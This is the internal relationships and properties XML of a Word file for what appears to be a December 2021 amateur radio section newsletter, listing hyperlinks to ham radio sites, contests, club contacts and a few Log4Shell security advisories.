Target="https://r20.rs6.net/tn.jsp?f=001kx5LN97YU-UGY6wF-L9xyRT4tmgqlzjxuGHwmsuBNm8XBnonjzPaaq9A3ryfUvklXOZkZSBmT3js9a1Ose38TTVfunQB-Q201eX0HVWmc6TAE9oE-TO7BfrGTtUR44kWUq8RQJqAJXDo5iUZDq-y4bKBJplRut4iGqfde7JGRcQPcdX1EvdVrsjiqeHFtEWvYUJ3cSg1wvqd34JjbAg9trqHHcH_DF0O&amp;c=kIpQD25qoHRFhdQ2Ba0o4VJit1Q8gxDADc3pnXrdnw0vk5KjM7QNXw==&amp;ch=KK331ObtITjHCwnv2Bbfvk2eKOHB9kUpS_A3tEmvib6gk_PboRtDRA==" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tiny.cc/cfarc-gen" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bit.ly/2pCiRo1" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arrl-ohio.org" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:broadways@standi.com" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/arrl-periodicals-archive-search" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=com.branded.arrl&amp;hl=en" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dxmarathon.com/Submission/2021/Submission2021.htm" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ft8activity.eu/index.php/en" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ohsimplex.org" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arrl-ohio.org/news/2020/print_your_license.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/chvancooten/status/1469340927923826691" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nlsa.com/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.425dxn.org/" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:clubs@arrl.org" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.qrz.com" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://log4shell.huntress.com/" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hamsoft.ca/pages/mmsstv.php" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/digital-qst-sample-form" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://n7ng.wordpress.com/2015/09/22/the-complete-dxer/" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/clubs" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:hamexams@atara-w8atr.fun" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bit.ly/2Oi8fsa" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cq160.com/rules.htm" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atara-w8atr.fun" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpg"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:Opt-In" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2.bp.blogspot.com/-oQO2ZhFk6aw/VBjpD66yEYI/AAAAAAAAAqM/nD52ReWN8sw1FQZIklfi8EF5VjzPNckUACPcBGAYYCw/s1600/John+KD8IDJ-small.jpg" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:clubs@arrl.org" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Minecraft" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/straight-key-night" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:k8zt@arrl.net" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/qst-annual-indexes" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itunes.apple.com/us/app/qst/id531766442?mt=8" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/files/file/QST%20Binaries/" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/15Q-vzGvn0HwUdp56gN-c2Hq9JAzOajLB6LdrFN_Oapo/copy" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bit.ly/2Qv3wkA" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nraubaltic.eu" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-EMLcXahq7o0/WHuWYD7kB6I/AAAAAAAACaY/Lw26BBqkZas5EdVdgBUXLuAWCibY01woACPcBGAYYCw/s1600/OSJ+Logo.jpg" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tinyurl.com/78z37kdj" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NCSC-NL/log4shell/blob/main/software/README.md" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=uk.me.g4dpz.HamSatDroid&amp;hl=en_US" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cq-amateur-radio.com/cq_offer_new_ham.html" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.goodreads.com/book/show/9402644-a-year-of-dx" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/sections" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://r20.rs6.net/tn.jsp?f=001DxdXS40dvzmbl9m9sfY5l9IIoAGYYsZIQIObAktg-wnnAu__YbvuVuV1_NQmLDKapbqCCYZK1L6epi1k5lVvuEtL_I1T0LMdgzjsNGvi1UnoIj7Lpv0RFoxS8h0YOCVVODgyzQI8xFTrmQ0pr6RXkQVvSx_cjGgR-DubSFhvF7CPVtMoPBph8tt8RpjGjyyBlRFHzo_VhR4=&amp;c=Oi-83JMf17RlM94bujSYqqAwfNyIPWszQZKKkjp6BM5J7PHkAvaFrA==&amp;ch=Kr1c-7rzal6CKkNUvSX-jLXK5eG9iU0tKZ5xoqUUqM21mzFnc1rE3w==" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/january-vhf" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:hamexams@atara-w8atr.fun" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:swap@arrlohio.org" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Common_Vulnerability_Scoring_Syste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EBA3435-BC61-40F4-AA86-5532DB2A65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1961</TotalTime>
  <Pages>46</Pages>
  <Words>14899</Words>
  <Characters>84928</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>707</Lines>
  <Paragraphs>199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99628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Scotts</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Scott Yonally</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <cp:lastPrinted>2021-12-28T00:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-25T15:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-28T00:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>